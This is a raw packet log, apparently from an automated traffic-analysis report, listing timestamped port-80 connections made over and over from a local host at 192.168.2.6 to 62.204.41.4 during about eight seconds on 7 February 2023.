Feb 7, 2023 20:03:59.549087048 CET	50401	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.550190926 CET	50402	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.613154888 CET	80	50401	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.613194942 CET	80	50402	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.613305092 CET	50401	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.613364935 CET	50402	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.613925934 CET	50402	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.674547911 CET	80	50402	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.676512003 CET	80	50402	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.676692009 CET	50402	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.784235954 CET	50402	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.785516977 CET	50403	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.845078945 CET	80	50402	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.845190048 CET	50402	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.847104073 CET	80	50403	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.847248077 CET	50403	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.851321936 CET	50403	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.913315058 CET	80	50403	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.915623903 CET	80	50403	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.915853024 CET	50403	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.041244984 CET	50403	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.047812939 CET	50404	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.103023052 CET	80	50403	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.103152037 CET	50403	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.109359980 CET	80	50404	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.109556913 CET	50404	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.112464905 CET	50404	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.173886061 CET	80	50404	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.177272081 CET	80	50404	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.177392960 CET	50404	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.282169104 CET	50404	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.283073902 CET	50405	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.343343973 CET	80	50405	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.343477011 CET	50405	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.343638897 CET	80	50404	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.343765020 CET	50404	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.344096899 CET	50405	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.404906034 CET	80	50405	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.406989098 CET	80	50405	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.407073021 CET	50405	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.523117065 CET	50405	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.524542093 CET	50406	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.583596945 CET	80	50405	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.583750963 CET	50405	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.587405920 CET	80	50406	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.587568998 CET	50406	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.598596096 CET	50406	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.661384106 CET	80	50406	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.665374994 CET	80	50406	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.665559053 CET	50406	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.786410093 CET	50406	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.787204027 CET	50407	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.847770929 CET	80	50407	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.847867012 CET	50407	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.848989964 CET	50407	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.849294901 CET	80	50406	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.849384069 CET	50406	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:00.909442902 CET	80	50407	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.911798954 CET	80	50407	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:00.911902905 CET	50407	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.034897089 CET	50407	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.035790920 CET	50408	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.095715046 CET	80	50407	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.095829964 CET	50407	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.096010923 CET	80	50408	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.096102953 CET	50408	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.096954107 CET	50408	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.157238007 CET	80	50408	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.162182093 CET	80	50408	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.162300110 CET	50408	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.267184973 CET	50408	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.269140959 CET	50409	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.327783108 CET	80	50408	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.328444958 CET	50408	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.330566883 CET	80	50409	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.334089041 CET	50409	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.334892035 CET	50409	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.396377087 CET	80	50409	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.399890900 CET	80	50409	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.400075912 CET	50409	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.517977953 CET	50409	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.519270897 CET	50410	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.579770088 CET	80	50409	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.579865932 CET	80	50410	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.579927921 CET	50409	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.579993963 CET	50410	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.580414057 CET	50410	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.640763998 CET	80	50410	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.644088030 CET	80	50410	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.646951914 CET	50410	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.751996040 CET	50410	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.752962112 CET	50411	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.812588930 CET	80	50410	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.814290047 CET	80	50411	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.814371109 CET	50410	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.814423084 CET	50411	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.821830034 CET	50411	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:01.883100033 CET	80	50411	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.885998964 CET	80	50411	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:01.886188984 CET	50411	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.001169920 CET	50411	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.001872063 CET	50412	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.063617945 CET	80	50411	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.063754082 CET	50411	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.064160109 CET	80	50412	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.064419031 CET	50412	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.064924955 CET	50412	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.126374006 CET	80	50412	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.131974936 CET	80	50412	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.132539988 CET	50412	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.252796888 CET	50412	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.257555008 CET	50413	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.314259052 CET	80	50412	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.314450026 CET	50412	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.319300890 CET	80	50413	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.319525003 CET	50413	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.323272943 CET	50413	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.385001898 CET	80	50413	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.387392998 CET	80	50413	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.387507915 CET	50413	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.533267975 CET	50413	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.534147024 CET	50414	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.594857931 CET	80	50414	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.594891071 CET	80	50413	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.595050097 CET	50414	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.595108032 CET	50413	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.595462084 CET	50414	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.655780077 CET	80	50414	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.658051968 CET	80	50414	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.658273935 CET	50414	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.775285006 CET	50414	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.776098967 CET	50415	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.835871935 CET	80	50414	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.836095095 CET	50414	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.836467028 CET	80	50415	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.836617947 CET	50415	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.837203026 CET	50415	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:02.898241997 CET	80	50415	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.900954962 CET	80	50415	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:02.901127100 CET	50415	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.021100044 CET	50415	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.023051023 CET	50416	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.081693888 CET	80	50415	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.081892014 CET	50415	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.084446907 CET	80	50416	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.084656000 CET	50416	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.085072994 CET	50416	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.147756100 CET	80	50416	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.150670052 CET	80	50416	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.150768042 CET	50416	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.266962051 CET	50416	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.267739058 CET	50417	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.327636957 CET	80	50417	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.327744961 CET	50417	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.328443050 CET	80	50416	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.328677893 CET	50416	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.329320908 CET	50417	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.388925076 CET	80	50417	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.391789913 CET	80	50417	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.391874075 CET	50417	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.502449989 CET	50417	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.503437996 CET	50418	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.562346935 CET	80	50417	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.562453985 CET	50417	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.564671040 CET	80	50418	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.564778090 CET	50418	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.565176010 CET	50418	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.626522064 CET	80	50418	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.629466057 CET	80	50418	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.629581928 CET	50418	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.736378908 CET	50418	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.737282991 CET	50419	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.797938108 CET	80	50418	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.798103094 CET	50418	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.799726963 CET	80	50419	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.799918890 CET	50419	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.800340891 CET	50419	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.862807989 CET	80	50419	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.865376949 CET	80	50419	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:03.865505934 CET	50419	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.972187996 CET	50419	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:03.973011971 CET	50420	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.034725904 CET	80	50420	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.034864902 CET	50420	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.034909010 CET	80	50419	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.034990072 CET	50419	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.035367012 CET	50420	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.096720934 CET	80	50420	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.100559950 CET	80	50420	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.100657940 CET	50420	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.207825899 CET	50420	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.208621979 CET	50421	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.268871069 CET	80	50421	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.269061089 CET	50421	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.269089937 CET	80	50420	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.269182920 CET	50420	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.274056911 CET	50421	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.335969925 CET	80	50421	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.338717937 CET	80	50421	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.342273951 CET	50421	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.459856987 CET	50421	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.461585999 CET	50422	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.520328045 CET	80	50421	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.522104025 CET	80	50422	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.522269964 CET	50421	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.522404909 CET	50422	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.527765036 CET	50422	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.588118076 CET	80	50422	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.591325045 CET	80	50422	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.591427088 CET	50422	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.705744028 CET	50422	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.706867933 CET	50423	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.767389059 CET	80	50422	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.769534111 CET	80	50423	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.769774914 CET	50422	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.769877911 CET	50423	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.774413109 CET	50423	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.836025953 CET	80	50423	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.839099884 CET	80	50423	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:04.839373112 CET	50423	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.955039024 CET	50423	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:04.955816031 CET	50424	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.015503883 CET	80	50424	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.015750885 CET	50424	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.016891003 CET	50424	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.017550945 CET	80	50423	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.017678022 CET	50423	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.076251984 CET	80	50424	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.080219030 CET	80	50424	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.080486059 CET	50424	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.189668894 CET	50424	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.190443993 CET	50425	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.249181986 CET	80	50424	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.249654055 CET	50424	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.251758099 CET	80	50425	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.252002954 CET	50425	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.253500938 CET	50425	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.315032005 CET	80	50425	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.317790985 CET	80	50425	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.317984104 CET	50425	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.439137936 CET	50425	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.440088987 CET	50426	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.500684977 CET	80	50425	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.500871897 CET	50425	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.501462936 CET	80	50426	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.501641035 CET	50426	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.502600908 CET	50426	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.564009905 CET	80	50426	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.567068100 CET	80	50426	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.567215919 CET	50426	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.673727036 CET	50426	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.674401045 CET	50427	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.735121965 CET	80	50427	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.735238075 CET	80	50426	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.735369921 CET	50427	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.735423088 CET	50426	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.737323999 CET	50427	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.798038006 CET	80	50427	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.800420046 CET	80	50427	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.800580025 CET	50427	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.909198999 CET	50427	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.910008907 CET	50428	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.970331907 CET	80	50427	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.970530987 CET	50427	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.971539974 CET	80	50428	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:05.971731901 CET	50428	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:05.975694895 CET	50428	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.037286997 CET	80	50428	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.039757967 CET	80	50428	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.039947987 CET	50428	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.143443108 CET	50428	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.144431114 CET	50429	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.204931021 CET	80	50429	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.204961061 CET	80	50428	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.205132961 CET	50428	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.205133915 CET	50429	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.205612898 CET	50429	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.266041994 CET	80	50429	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.270401001 CET	80	50429	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.270523071 CET	50429	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.429352999 CET	50429	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.430236101 CET	50430	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.489886045 CET	80	50429	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.490017891 CET	50429	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.492435932 CET	80	50430	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.492594957 CET	50430	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.494424105 CET	50430	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.556678057 CET	80	50430	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.559781075 CET	80	50430	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.559906006 CET	50430	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.677361965 CET	50430	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.678272963 CET	50431	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.739957094 CET	80	50430	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.740046978 CET	50430	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.740650892 CET	80	50431	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.740757942 CET	50431	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.742108107 CET	50431	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.804414988 CET	80	50431	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.807320118 CET	80	50431	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.807421923 CET	50431	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.924825907 CET	50431	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.925558090 CET	50432	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.986995935 CET	80	50432	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.987188101 CET	50432	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.987375975 CET	80	50431	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:06.987469912 CET	50431	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:06.987942934 CET	50432	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.049335003 CET	80	50432	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.053987026 CET	80	50432	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.054104090 CET	50432	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.189027071 CET	50432	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.189944983 CET	50433	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.252116919 CET	80	50432	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.252260923 CET	50432	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.252373934 CET	80	50433	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.252507925 CET	50433	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.254487991 CET	50433	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.317082882 CET	80	50433	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.319380045 CET	80	50433	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.319490910 CET	50433	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.424571037 CET	50433	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.425698996 CET	50434	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.486833096 CET	80	50433	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.487031937 CET	80	50434	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.487149954 CET	50433	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.487216949 CET	50434	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.488023043 CET	50434	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.549278975 CET	80	50434	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.553051949 CET	80	50434	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.553527117 CET	50434	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.659111023 CET	50434	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.660028934 CET	50435	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.719429970 CET	80	50435	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.720496893 CET	80	50434	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.720546961 CET	50435	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.720587015 CET	50434	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.721879005 CET	50435	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.781335115 CET	80	50435	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.789803028 CET	80	50435	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.789994001 CET	50435	80	192.168.2.6	62.204.41.4
